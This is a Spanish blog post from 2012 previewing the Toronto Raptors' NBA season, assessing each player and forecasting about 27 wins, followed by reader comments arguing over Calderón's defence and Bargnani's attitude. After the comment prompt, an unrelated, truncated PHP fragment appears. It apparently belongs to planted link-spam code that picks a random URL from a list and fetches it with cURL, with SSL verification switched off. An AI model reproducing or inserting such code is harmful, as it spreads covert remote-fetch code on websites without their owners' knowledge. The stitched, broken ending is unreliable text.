Toronto Raptors: A oscuras

07 de January de 2012 por Hynreck

Podríamos haber titulado el análisis  “A la deriva” pero eso querría decir que son un equipo que se mueve aunque sea en la dirección equivocada. En realidad su actitud es más bien la contraria: timorata, estática, como si estuviesen en un cuarto en el que no se ve nada y tuviesen miedo de dar el paso erróneo.

Éste año no presentan ninguna novedad destacable en el roster. Son el mismo equipo que la pasada temporada ganó 22 partidos que le sirvieron para convertirse en el tercer peor equipo de la liga. Y no parece que haya intención alguna de remediarlo. Para colmo, su elección 5 del draft no llegará hasta el verano que viene, con lo que tienen un motivo menos para ilusionarse.

Lo cierto es que son un equipo extrañamente descompensado, con jugadores completamente heterodoxos para la posición que ocupan: Un base suplente que no sabe dirigir, un escolta que no sabe tirar a distancia, un pívot con alergia a la pintura…

Empecemos con la posición de base. Parte como titular nuestro Jose Calderón. Quizás sus mayores virtudes sean la inteligencia y la visión de juego pero su defensa es un sueño para el base con el que se enfrenta al contar con una capacidad de desplazamiento lateral casi nula que le impide negar cualquier penetración. Jerryd Bayless es prácticamente antagónico. Tiene unas condiciones tremendas pero una completa falta de comprensión del juego. Está ante una gran oportunidad pero no parece ser consciente de ello. Mediante la agencia libre contrataron al eterno Anthony Carter quien a sus casi 37 años aportará veteranía en los pocos minutos que disponga.

DeMar DeRozan es el jugador con mayor valor de mercado del equipo. Su crecimiento la temporada pasada fue tremendo y tiene unas facultades maravillosas. Ya nos advirtieron que era un diamante por pulir y tiene aún mucho margen de mejora sobre todo en lo que se refiere al tiro exterior (su 5 de 52 en triples la temporada pasada es una cifra vergonzosa). Parece que durante el obligado parón se ha puesto manos a la obra  o al menos así lo atestiguan sus números hasta el momento. Leandrinho Barbosa será el primer recambio desde el banco. A su edad parece que nunca pasará de un rol más importante que el de sexto hombre y él se encuentra cómodo ahí así que…

Para paliar la falta de especialistas desde más allá de la línea de 3 ficharon otro agente libre como Rasual Butler, quien apenas tendrá competencia de calidad. James Johnson no acabó mal el curso pasado, sin embargo parece que tendrá menos presencia. Su aportación será la contraria que la de Butler: cargar el rebote y ayudar en defensa. Además habrá que contar con la vuelta de Linas Kleiza en febrero tras su lesión. El jugador de segundo año Gary Forbes completa la posición y no se espera que sea una pieza de peso.

Ed Davis y Amir Johnson competirán por el puesto de PF. Son dos jugadores con un potencial interesante pero aún lejos de la élite de la liga (demasiado lejos añadiría). Su función será compensar la ausencia en la zona de Bargnani peleando cada balón que quede suelto por allí.

Finalmente, Andrea Bargnani partirá como falso pívot del equipo. El italiano tiene una clase fuera de toda duda, una mecánica de tiro envidiable y una altura y una envergadura con las que podría ser dominante pero el chico nació con horchata en las venas en lugar de sangre. Muchas veces parece que peca de desidia, de desgana, juega igual vaya perdiendo o ganando. En Argentina le dirían pecho frío, rehuye del contacto y no aprovecha todo lo que podría dar de sí, una pena. En el banco esperarán su oportunidad Aaron Gray, quien destacó el pasado año en New Orleans, Salomon Alabi, que tuvo una actuación testimonial y no se espera que vaya mucho más allá, y Jamaal Magloire (brrrrr, me acaba de recorrer un escalofrío por todo el cuerpo), primer canadiense en la historia de los Raptors, otrora All-Star, y más parecido en sus últimos años a un dinosaurio fosilizado (mira que bien traído) que a un jugador de baloncesto.

Ésta es la realidad de estos Raptors. Equipo dificil de comprender, sin mucho presente, salvo alguna excepción que hemos mencionado, un futuro cuanto menos dudoso y una serie de jugadores jóvenes que yendo todo bien aspirarían a acomodarse entre la clase media de la liga. Seguramente ganen algún partido más que las 22 victorias de la temporada pasada pero sin ser un crecimiento destacable. Calderón y Bargnani podrían ser buenas monedas de cambio y su objetivo debería ser empezar a coleccionar rondas.

Quinteto titular: Jose Calderón, Demar DeRozan, Rasual Butler, Amir Johnson, Andrea Bargnani
Sexto hombre: Leandro Barbosa

Altas: Rasual Butler, Anthony Carter, Aaron Gray, Jamaal Magloire y Gary Forbes (Rookie)
Bajas: Alexis Ajinca, Joey Dorsey y Julian Wright

Previsión: sobre 27 victorias, fuera de playoffs

Comenta

29 comentarios a esta entrada

  1. melo15 dice:
    #1

    porque no ponen a Derozan de alero

      Citar

  2. Jose Luis dice:
    #2

    27 victorias? espera espera, eso es en un baremo sobre 82 ¿no? porque si no, mi opinión es que sois muy optimistas con los Raptors. Creo que yo anoche dije que podían llegar a play-offs en 2014 o por ahí. Bueno, habrá que ver quién mueven al puesto de base cuando acabe el contrato de Calde (o quizá le quieran renovar a la baja), pero un núcleo con Bargnani, DeRozan, Ed Davis, Valanciunas, su próximo draft (probablemente top 8)… no sé, a mi me parece atractivo, quizá haga falta un jugador que meta 15 puntos por noche (fichaje para el puesto de base o alero) y yo creo que pueden colarse en play-offs vamos. Pero en 2014 o 2015, hasta entonces, nada de nada.

      Citar

  3. Hynreck dice:
    #3

    Jose Luis: 27 victorias? espera espera, eso es en un baremo sobre 82 ¿no? porque si no, mi opinión es que sois muy optimistas con los Raptors. Creo que yo anoche dije que podían llegar a play-offs en 2014 o por ahí. Bueno, habrá que ver quién mueven al puesto de base cuando acabe el contrato de Calde (o quizá le quieran renovar a la baja), pero un núcleo con Bargnani, DeRozan, Ed Davis, Valanciunas, su próximo draft (probablemente top 8)… no sé, a mi me parece atractivo, quizá haga falta un jugador que meta 15 puntos por noche (fichaje para el puesto de base o alero) y yo creo que pueden colarse en play-offs vamos. Pero en 2014 o 2015, hasta entonces, nada de nada.

      Citar

  4. Hynreck dice:
    #4

    Tienes razón, fue un lapsus extrapolar las 27 victorias a una temporada de 82 partidos.

      Citar

  5. shaggy dice:
    #5

    Yo en una temporada cm esta no creo q llegen ni a las 20 victorias

      Citar

  6. @pedrolongas dice:
    #6

    Pufffff, hombre creo que mis suns son peores pero claro el director es Nash, pero el problema de Toronto es más grande, es que no pueden retener a un gran jugador, enotonces siempre irán a la deriva….. o a donde sea menos al éxito.

    Si no pueden aglutinar un jugador al que rodear de complementos correctos, siempre tendrán un equipo mediocre, espero que el nuevo convenio favorezca la repartición de estrellas.

      Citar

  7. Nacho dice:
    #7

    Voy a discrepar,y eso que anoche la cagaron. Depende hacia adonde vayan, hacia el lado bueno, ateiores partidos, o hacia el de ayer. Pero tienen cosas positivas:
    Un entrenador que realmente lo parece, que inculca defensa y cosas sensatas en ataque.
    -Un Calderón que se está saliendo, asumiendo galones, defendiendo mucho mejor de lo que creéis, y sobre todo, creyéndoselo él mismo.
    -Bargnani tendrá horchata, pero es de lo mejor que hay. Y en este principio de temporada lo está demostrando. Letal en el tiro como siempre, brutal su finta y penetración desde el poste alto, y mejorando su juego al poste bajo. Empieza a rebotear más.
    -De Rozan no ha empezado bien, pero puede (y debe) mejorar.
    Amir Jonhson aporta intensidad. tendrán que cuadrar los nuevos pero hay más luces de lo que muchos pensáis.
    Pronóstico: rozarán los PlayOffs, siempre cuando no se dejen caer, y creo que tienen un entrenador que luchará por que eso no suceda.

      Citar

  8. Sancho88 dice:
    #8

    Decir de Calderón que no sabe defender, es haberse perdido muchos capítulos de su carrera

      Citar

  9. Sancho88 dice:
    #9

    Nacho:
    Voy a discrepar,y eso que anoche la cagaron. Depende hacia adonde vayan, hacia el lado bueno, ateiores partidos, o hacia el de ayer. Pero tienen cosas positivas:
    Un entrenador que realmente lo parece, que inculca defensa y cosas sensatas en ataque.
    -Un Calderón que se está saliendo, asumiendo galones, defendiendo mucho mejor de lo que creéis, y sobre todo, creyéndoselo él mismo.
    -Bargnani tendrá horchata, pero es de lo mejor que hay. Y en este principio de temporada lo está demostrando. Letal en el tiro como siempre, brutal su finta y penetración desde el poste alto, y mejorando su juego al poste bajo. Empieza a rebotear más.
    -De Rozan no ha empezado bien, pero puede (y debe) mejorar.
    Amir Jonhson aporta intensidad. tendrán que cuadrar los nuevos pero hay más luces de lo que muchos pensáis.
    Pronóstico: rozarán los PlayOffs, siemprecuando no se dejen caer, y creo que tienen un entrenador que luchará por que eso no suceda.

    Mucho más de acuerdo con Nacho que con Hynreck. Me parece un mucho mejor análisis de la situación actual de estos raptors

      Citar

  10. Txusma dice:
    #10

    Cierto, Calderon ha empezado la temporada a tope, dejando atrás todos los problemas de lesiones que ha padecido estos 2 últimos años. Ahora, no me digáis que Calderon defendía bien pq no. En EEUU todos sabían que era un coladero, incapaz de defender en el 1vs1 a la mayoría de bases de la NBA. No es que no supiera, es que las piernas no le daban por culpa de las lesiones. Si ahora está recuperado puede volver al nivel de aquella temporada en que a punto estuvo de batir el récord de tiro libres consecutivos. La 2008-2009, no?

      Citar

  11. Nacho dice:
    #11

    PARTIDAZO ANOCHE EN PHILADELFIA.
    Ayer los Raptors hicieron el peor partido que les recuerdo, y he visto muchos y muchos de esos malos, malísimos, pero lo de anoche… Aunque igual hay matices (“arrebuscando” mucho, eso sí)
    Llevan dos partidos malos de solemnidad, quizás para hacer méritos ante el análisis que nos proponéis. El de anoche buffff (menos mal que lo he visto esta mañana…)
    Pero vamos a quedarnos con los matices positivos (si es que los hay):
    Aguantaron a los Phillies hasta los tres minutos del tercer cuarto (ellos también hicieron un partido horroroso) y eso fue debido a la intensidad defensiva, nuevo gen de estos Raptors, y lo que les puede ayudar muchos días. Y de hecho ayer les valió medio tiempo, pero ante tal inoperancia ofensiva todo el entramado se vino abajo.
    Calderón mal, mal, mal, de hecho falló su primer tiro libre de la temporada, un signo vamos. Aún así “solo” perdió dos bolas y se fue a las 7 asistencias (con un poco de ayuda de los tiros abiertos que dejó y se fallaron, sube a las doce. Menos mal porque no lo mercía- ni las 7-)
    Bargnani mal, mal (solo dos porque Calde estuvo peor) aún así se fue a los 21 puntos y “OJO” “DOCEEEEE” rebotes, nervioso y con mala selección de tiro.
    Butler “who’s that guy” Pues eso, se sigue buscando, incluso él mismo.
    Amir Johnson, el único que se podría salvar, ¿por qué? porque siempre hace más de lo que cualquiera esperaría de él.
    DeRozan, peor, peor, peor. Aún no ha aparecido. ¿Y pensáis que él podría liderar la tan ansiada renovación?
    El 6º hombre, desastroso. Un tipo así debería plantearse seriamente la retirada, o cambiar el chip.
    Del resto mejor ni hablar.
    ¿La esperanza? Que el entrenador (del que desconozco el nombre- y sí podría mirarlo, pero…-) no les deje caer en la indolencia, y que Calde y Bargnani vuelvan a sus fueros, y aparezca DeRozan.
    No desfallezco.
    Proximamente… Calderón vs. Ricky, puede ser la leche, y por una vez no iré con los de Toronto. Si dejan hacer a Rubio (en el último partido no pasó) son mucho más divertidos de ver.

      Citar

  12. DoctorF dice:
    #12

    Totalmente de acuerdo. Toronto horrible, se desinfla lo poco que se había inflado en partidos precedentes. Y no os confundáis: los Wolves van por camino similar tras los buenos primeros choques. Ninguno de los dos llegará a nada; si acaso, leves e instrascendentes mejorías. Los gasoles, Rudy e Ibaka serán los ‘españoles’ en play-off.

      Citar

  13. RSB dice:
    #13

    Pues Hynreck no dice ninguna mentira en su análisis. Nuestro Calde nunca ha sido un excelso defensor que digamos, eso ya ha sido motivo de dabate en años anteriores en EEUU. Concentrado y físicamente al 100% puede hacer un buen esfuerzo intentando detener al base rival, tampoco es un cero a la izquierda en ese aspecto como sí lo son otros bases de la liga, pero no es un buen defensor. Eso no quita que sea el base con mejor ratio asistencias/pérdidas de la liga en estos momentos, y que esté viviendo una temporada a su mejor nivel, como cuando firmó la locura de contrato que le pusieron delante.

    Y lo de Bargnani es otra obviedad. Es desesperante ver como le cogen rebotes ofensivos una y otra vez delante de sus narices. Con lo alto que es sorprende lo mal que defiende y el poco contacto que tolera. Yo creo que es más una cuestión de actitud que otra cosa. Y mira que en ataque tiene muchos recursos y cuando tiene el día te fusila pero… Nunca será un All-Star (ya ni hablo de jugador franquicia).

    De Rozan dos partidos que he visto esta temporada y dos que lo he pillado en sus peores actuaciones, tirándose unas piedras que ni los niños de 14 años en el barrio… A ver si lo cojo en un día bueno, porque me dejó con cara de póker

      Citar

  14. portu dice:
    #14

    Todo junto parece una comida en la q los ingredientes no se mezclan bien, es q es como todos decís, Calde no está tan mal como otros años, no desentonaría en ningún equipo, DeRozan parece q tiene cositas, al menos físico, Bargnani tiene momentos de verdadero supercrack, Amir J. es el típico 4 peleón como han tenido muchos equipos grandes… pero todo junto falla, hay cosas q no encajan y creo q el punto clave es la defensa… unos no tienen piernas, otros no tienen concentración, otros no tienen actitud… tampoco se ven ganadores y en definitiva es un equipo “raro”, poco físico,… no sé, podría ver a Bagnani rodeado de tíos currantes al estilo de Dallas con Nowitzki, pero en estos Raptors todavía se ven más sus carencias.

      Citar

  15. Nacho dice:
    #15

    portu: Todo junto parece una comida en la q los ingredientes no se mezclan bien, es q es como todos decís, Calde no está tan mal como otros años, no desentonaría en ningún equipo, DeRozan parece q tiene cositas, al menos físico, Bargnani tiene momentos de verdadero supercrack, Amir J. es el típico 4 peleón como han tenido muchos equipos grandes… pero todo junto falla, hay cosas q no encajan y creo q el punto clave es la defensa… unos no tienen piernas, otros no tienen concentración, otros no tienen actitud… tampoco se ven ganadores y en definitiva es un equipo “raro”, poco físico,… no sé, podría ver a Bagnani rodeado de tíos currantes al estilo de Dallas con Nowitzki, pero en estos Raptors todavía se ven más sus carencias.

    Aunque lo reseñable es “Calde no está tan mal como otros años”, o sea, que según tú, está mal, pero menos. Yo hay cosas que flipo, de verdad, y no soy patriotero, pero decir eso de Calde, cuando está haciendo un inicio de temporada espectacular, salvo el último partido, que sí que fue malo, me pareceque no es medirlo con el mismo rasero que a otros.

      Citar

  16. HeiNeKeN dice:
    #16

    Amir Johnson y James Johnson estan dandole la victoria a los Raptors.
    Calderon jugando bien, Bargnani abusando de Milicic y Tolliver

      Citar

  17. portu dice:
    #17

    Nacho: Aunque lo reseñable es “Calde no está tan mal como otros años”, o sea, que según tú, está mal, pero menos. Yo hay cosas que flipo, de verdad, y no soy patriotero, pero decir eso de Calde, cuando está haciendo un inicio de temporada espectacular, salvo el último partido, que sí que fue malo, me pareceque no es medirlo con el mismo rasero que a otros.

    Básicamente es una forma de hablar, quería incidir en lo mal q lo he visto estos años pasados, sobretodo por problemas físicos, pero tb por haber perdido su “toque” en el tiro exterior. Su gran campaña con Toronto vino precededida de un verano con un entrenamiento específico en el tiro con un americano, y el mismo Calde dijo q había modificado varias cosas, entre ellas no abrir tanto el codo izdo al realizar el tiro… esa temporada era espectacular verle salir de un bloqueo botando, levantarse de 5-6 m y enchufar unas tras otra, no abusaba de sus tiros (como hace ahora) pero sabías q iba a enchufarlas casi todas las q tiraba con buena posición.
    Por desgracia, eso no es así ahora mismo, se ha convertido en un base pasador q no tira con la misma confianza, está claro q no es Rondo, pero en esta liga para ser un gran base o eres buen penetrador o buen tirador o ambos, ahora es simplemente un buen pasador, q ya es mucho, o sea, base del montón en ataque, ideal para un equipo de chupones como hay muchos en la NBA, pero en los Raptors sólo sabe crearse sus tiros Bargnani… si me vas a hablar de números pues vale, ahí me callo, Calde no pierde muchas bolas y como te decía no abusa de sus tiros, así q si juega más de 30 minutos es lógico q haga buenos números.
    Y luego la defensa, yo creo q su posición defensiva es pura fachada, parece siempre superaplicado, pero en realidad no para ninguna penetración, está lento de piernas y ha perdido muchísimo salto, además en esta liga hay auténticos aviones en la posición de 1. Su inteligencia, su saber estar, su visión del juego le ayudan, pero yo le veo limitaciones importantes, pero como quise expresar le veo mejor q estas dos temporadas pasadas. Y aunque no se haya notado me gusta mucho Calde, ja, ja.

      Citar

  18. nach dice:
    #18

    Calderón teniendo en cuenta sus características tendrá su oportunidad de ganar un anillo en cuanto acabe el contrato-atraco que tiene ahora.

    En Miami me pegaría muchísimo, un buen distribuidor que si está solo en el triple las enchufa pero que no abusa del triple en un equipo lleno de chupones? Ni a propósito oiga

      Citar

  19. Nacho dice:
    #19

    Temporada 2011-12, Calderón:
    Tiros de campo 51.2% anteriores 48.6%
    Triples 39.4% ” 38.3%
    libres 93.3% ” 87.6%
    anota tres puntos más por partido, da dos asistencias más, rebotea más y pierde menos bolas.
    Y sí, en más minutos, pero es que el basket no es regla de tres, así que jugar más minutos y subir en todos los aspectos del juego creo que, por lo menos, indica una mejora (sustancial a mi juicio) del juego.

      Citar

  20. Nacho dice:
    #20

    nach: Calderón teniendo en cuenta sus características tendrá su oportunidad de ganar un anillo en cuanto acabe el contrato-atraco que tiene ahora.En Miami me pegaría muchísimo, un buen distribuidor que si está solo en el triple las enchufa pero que no abusa del triple en un equipo lleno de chupones? Ni a propósito oiga

    ¿Contrato-atraco? ¿Y cuál no? ¿Y qué no están acordes a su rendimiento, cuántos? Es que parece que Joe Jonhson, Calde y un par de ellos más son los que tienen contratos-atraco. Por que de otros no se habla.

      Citar

  21. nach dice:
    #21

    Nacho: ¿Contrato-atraco? ¿Y cuál no? ¿Y qué no están acordes a su rendimiento, cuántos? Es que parece que Joe Jonhson, Calde y un par de ellos más son los que tienen contratos-atraco. Por que de otros no se habla.

    Que existan otros contratos similares o incluso peores no hacen que el de Calderón no sea un contrato-atraco xD

      Citar

  22. Viva_Dirk dice:
    #22

    La comparación de Bargnani con Nowitzki me ha llegado al alma, casi me da un puto infarto.

      Citar

  23. Blade Petrovic dice:
    #23

    Txusma:
    Cierto, Calderon ha empezado la temporada a tope, dejando atrás todos los problemas de lesiones que ha padecido estos 2 últimos años. Ahora, no me digáis que Calderon defendía bien pq no. En EEUU todos sabían que era un coladero, incapaz de defender en el 1vs1 a la mayoría de bases de la NBA. No es que no supiera, es que las piernas no le daban por culpa de las lesiones. Si ahora está recuperado puede volver al nivel de aquella temporada en que a punto estuvo de batir el récord de tiro libres consecutivos. La 2008-2009, no?

    Creo que tiene el mayor porcentaje de acierto de la historia 95 y pico%

      Citar

  24. esteban dice:
    #24

    Diganme soy el unico q esta sorprendido por los raptors? Estan muy por encima de lo q esperaba, bargani esta jugando tipo all star, quien lo dirian, lo mismo calderon y derozan y amir jhonsom estan manteniendo sus progresos, creo q las 8 plazas del este estan claras, sino habria ilusiones en canada, no lo creeis?

      Citar

  25. Nacho dice:
    #25

    esteban: Diganme soy el unico q esta sorprendido por los raptors? Estan muy por encima de lo q esperaba, bargani esta jugando tipo all star, quien lo dirian, lo mismo calderon y derozan y amir jhonsom estan manteniendo sus progresos, creo q las 8 plazas del este estan claras, sino habria ilusiones en canada, no lo creeis?

    Yo también, pero lo mío es congénito, por alguna extraña razón, si soy de un equipo NBA, es de ellos. Yo creo que por ser canadienses. Aunque no lo queramos muchos europeos tenemos ahí dentro el gen antiyanqui. Debe ser por eso.
    Bueno, después de la bobá que he soltado, sí, me sorprenden, pero te corrijo en algo, DeRozan está haciendo una temporada malilla, por no decir mala directamente. Si estuviera en algo parecido a lo que se espera de él, y el 3 fuera un jugador que sumara, podrían tener un par de victorias más.
    Y sí, Bargnani está All Star, por muchas fobias que tenga aquí. Es de los tipos con más clase que he visto y si se afana y afina en el rebote… se podría soñar.

      Citar

  26. esteban dice:
    #26

    Nacho, ademas bargani por primera vez esta siendo el lider que lidera en victorias, el año pasado tenia buenos numeros tamb pero su equopo era lamentable, este año es el lider de un equipo de un equipo q al menos deja buenas sensaciones y gana partidos

      Citar

  27. Dares dice:
    #27

    Yo en lo personal tengo el orgullo de decir que naci en canada en la linda ciudad de toronto , de verdad me da pena ver como pierden partidos tontamente los raptors, yo creo que el problema de toronto se basa en un tema llamado “ACTITUD” el hecho de que jugadores no quieran jugar por el equipo por el solo hecho de ser de canada, no se les ve un espiritu de competencia y claro esta marcado en la historia como jugadores se han negado de jugar por toronto, creo que falta mantener esa intensidad en las partes finales el mayor ejemplo esta en el partido frente a dallas ! pero aun asi siempre fanatico de los raptors ! algun dia estaremos en la mira de todos…

      Citar

  28. nach dice:
    #28

    El tema de Bargnani es más mental que otra cosa. Con su mecánica, su clase y su altura podría llegar a donde quisiera, pero tiene que pelear en la zona y fajarse con quien sea.

      Citar

  29. Esteban dice:
    #29

    Madre parece q bargnani leyo nuestros comentarios en este posteo y se decidio a callarnos, por ahy lei que nunca sera allstar, pues creo q lo sera esta temporada, seria un robo que vaya hibbert o chandler y no el de suplente de howard

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>